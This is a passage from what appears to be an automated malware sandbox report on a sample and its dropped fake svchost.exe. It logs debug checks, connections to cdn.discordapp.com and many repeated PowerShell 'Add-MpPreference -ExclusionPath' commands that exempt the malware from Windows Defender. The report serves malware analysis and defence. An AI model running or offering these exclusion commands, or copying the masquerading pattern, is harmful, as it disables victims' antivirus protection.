            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess queried: DebugPort
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 2576
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Users\Public\Documents\???????????????\svchost.exeDomain query: cdn.discordapp.com
            Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.133.233 443
            Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.130.233 443
            Adds a directory exclusion to Windows DefenderShow sources
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s9SWgUgyO5.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s9SWgUgyO5.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s9SWgUgyO5.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Users\user\Desktop\s9SWgUgyO5.exe C:\Users\user\Desktop\s9SWgUgyO5.exe
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 2576
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6376 -ip 6376
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4956 -ip 4956
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6728 -ip 6728
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 2184
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\???????????????\svchost.exe' -Force
            Source: C:\Users\Public\Documents\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6728 -s 2600
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526469104.0000000007CFE000.00000004.00000001.sdmpBinary or memory string: Program Manager$
            Source: s9SWgUgyO5.exe, 0000000A.00000002.525749959.000000000658A000.00000004.00000001.sdmpBinary or memory string: Program Manager$)
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526444995.00000000078FC000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager$I
            Source: s9SWgUgyO5.exe, 0000000A.00000002.522263848.00000000032DC000.00000004.00000001.sdmpBinary or memory string: Program Manager
            Source: s9SWgUgyO5.exe, 00000000.00000000.280869367.0000000001910000.00000002.00020000.sdmp, s9SWgUgyO5.exe, 0000000A.00000002.513781041.0000000001670000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000000.368430395.0000000001590000.00000002.00020000.sdmp, svchost.exe, 0000001B.00000000.382878733.0000000001C90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: s9SWgUgyO5.exe, 00000000.00000000.280869367.0000000001910000.00000002.00020000.sdmp, s9SWgUgyO5.exe, 0000000A.00000002.513781041.0000000001670000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000000.368430395.0000000001590000.00000002.00020000.sdmp, svchost.exe, 0000001B.00000000.382878733.0000000001C90000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: s9SWgUgyO5.exe, 00000000.00000000.280869367.0000000001910000.00000002.00020000.sdmp, s9SWgUgyO5.exe, 0000000A.00000002.513781041.0000000001670000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000000.368430395.0000000001590000.00000002.00020000.sdmp, svchost.exe, 0000001B.00000000.382878733.0000000001C90000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
            Source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmpBinary or memory string: Program ManagerD$
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526028000.0000000006C9C000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526396029.000000000732B000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager x
            Source: s9SWgUgyO5.exe, 0000000A.00000002.525577792.0000000005F8C000.00000004.00000001.sdmpBinary or memory string: Program Manager (
            Source: s9SWgUgyO5.exe, 0000000A.00000002.522091458.00000000031A2000.00000004.00000001.sdmpBinary or memory string: Program Manager|$Y
            Source: s9SWgUgyO5.exe, 00000000.00000000.280869367.0000000001910000.00000002.00020000.sdmp, s9SWgUgyO5.exe, 0000000A.00000002.513781041.0000000001670000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000000.368430395.0000000001590000.00000002.00020000.sdmp, svchost.exe, 0000001B.00000000.382878733.0000000001C90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
            Source: s9SWgUgyO5.exe, 00000000.00000000.280869367.0000000001910000.00000002.00020000.sdmp, s9SWgUgyO5.exe, 0000000A.00000002.513781041.0000000001670000.00000002.00020000.sdmp, svchost.exe, 0000000E.00000000.368430395.0000000001590000.00000002.00020000.sdmp, svchost.exe, 0000001B.00000000.382878733.0000000001C90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: s9SWgUgyO5.exe, 0000000A.00000002.518729936.0000000002ED5000.00000004.00000001.sdmpBinary or memory string: Program Manager4
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Users\user\Desktop\s9SWgUgyO5.exe VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
